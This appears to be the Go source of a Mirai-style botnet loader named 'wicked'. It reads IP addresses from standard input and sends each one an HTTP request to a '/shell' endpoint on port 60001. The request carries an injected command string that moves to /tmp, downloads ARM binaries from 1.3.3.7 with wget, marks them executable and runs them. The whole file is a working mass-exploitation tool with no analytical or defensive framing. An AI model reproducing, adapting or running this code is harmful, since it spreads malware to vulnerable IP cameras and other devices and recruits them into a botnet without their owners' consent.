1
#package# wicked
2

3
package main
4

5
import (
6
	f "fmt"
7
    "net"
8
    "time"
9
    "bufio"
10
    "os"
11
    "sync"
12
    "strings"
13
)
14

15
var CONNECT_TIMEOUT time.Duration = 6
16
var READ_TIMEOUT time.Duration = 15
17
var WRITE_TIMEOUT time.Duration = 10
18
var syncWait sync.WaitGroup
19

20
var payload string = "cd+/tmp;rm+arm+arm7;wget+http:/\\/1.3.3.7/arm7;chmod+777+arm7;./arm7+ipcams;wget+http:/\\/1.3.3.7/arm;chmod+777+arm;./arm+ipcams"
21

22
type scanner_info struct {
23
	username, password, ip, port, arch string
24
	bytebuf []byte
25
	err error
26
	resp, authed int
27
	conn net.Conn
28
}
29

30
func zeroByte(a []byte) {
31
    for i := range a {
32
        a[i] = 0
33
    }
34
}
35

36
func getStringInBetween(str string, start string, end string) (result string) {
37

38
    s := strings.Index(str, start)
39
    if s == -1 {
40
        return
41
    }
42

43
    s += len(start)
44
    e := strings.Index(str, end)
45

46
    return str[s:e]
47
}
48

49
func setWriteTimeout(conn net.Conn, timeout time.Duration) {
50
	conn.SetWriteDeadline(time.Now().Add(timeout * time.Second))
51
}
52

53
func setReadTimeout(conn net.Conn, timeout time.Duration) {
54
	conn.SetReadDeadline(time.Now().Add(timeout * time.Second))
55
}
56

57
func readUntil(conn net.Conn, read bool, delims ...string) ([]byte, int, error) {
58
	
59
	var line []byte
60

61
	if len(delims) == 0 {
62
		return nil, 0, nil
63
	}
64

65
	p := make([]string, len(delims))
66
	for i, s := range delims {
67
		if len(s) == 0 {
68
			return nil, 0, nil
69
		}
70
		p[i] = s
71
	}
72

73
	x := bufio.NewReader(conn)
74
	for {
75
		b, err := x.ReadByte()
76
		if err != nil {
77
			return nil, 0, err
78
		}
79

80
		if read {
81
			line = append(line, b)
82
		}
83

84
		for i, s := range p {
85
			if s[0] == b {
86
				if len(s) == 1 {
87
					return line, len(line), nil
88
				}
89
				p[i] = s[1:]
90
			} else {
91
				p[i] = delims[i]
92
			}
93
		}
94
	}
95

96
	return nil, 0, nil
97
}
98

99
func (info *scanner_info) cleanupTarget(close int, conn net.Conn) {
100

101
	if close == 1 {
102
		info.conn.Close()
103
	}
104

105
	zeroByte(info.bytebuf)
106
	info.username = ""
107
	info.password = ""
108
	info.arch = ""
109
	info.ip = ""
110
	info.port = ""
111
	info.err = nil
112
	info.resp = 0
113
	info.authed = 0
114
}
115

116
func processTarget(target string) {
117

118
    info := scanner_info {
119
	    ip: target,
120
	    port: "60001",
121
	    username: "",
122
	    password: "",
123
	    arch: "",
124
	    bytebuf: nil,
125
	    err: nil,
126
	    resp: 0,
127
	    authed: 0,
128
	}
129

130
	defer info.cleanupTarget(0, info.conn)
131
    info.conn, info.err = net.DialTimeout("tcp", info.ip + ":" + info.port, CONNECT_TIMEOUT * time.Second)
132
    if info.err != nil {
133
		syncWait.Done()
134
		return
135
    }
136

137
    defer info.cleanupTarget(1, info.conn)
138
    setWriteTimeout(info.conn, WRITE_TIMEOUT)
139
    info.conn.Write([]byte("GET /shell?" + payload + " HTTP/1.1\r\nConnection: keep-alive\r\nCache-Control: max-age=0\r\nUser-Agent: KrebsOnSecurity\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\n\r\n"))
140

141
	setReadTimeout(info.conn, 30)
142
	info.bytebuf = make([]byte, 256)
143
	l, err := info.conn.Read(info.bytebuf)
144
	if err != nil || l <= 0 {
145
	    syncWait.Done()
146
	    return
147
	}
148

149
	zeroByte(info.bytebuf)
150
    syncWait.Done()
151
    return
152
}
153

154
func main() {
155

156
	var i int = 0
157
    go func() {
158
        for {
159
            f.Printf("Scanner Running for: %d's\n", i)
160
            time.Sleep(1 * time.Second)
161
            i++
162
        }
163
    }()
164

165
    for {
166
        r := bufio.NewReader(os.Stdin)
167
        scan := bufio.NewScanner(r)
168
        for scan.Scan() {
169
            go processTarget(scan.Text())
170
            syncWait.Add(1)
171
        }
172
    }
173
}
174

175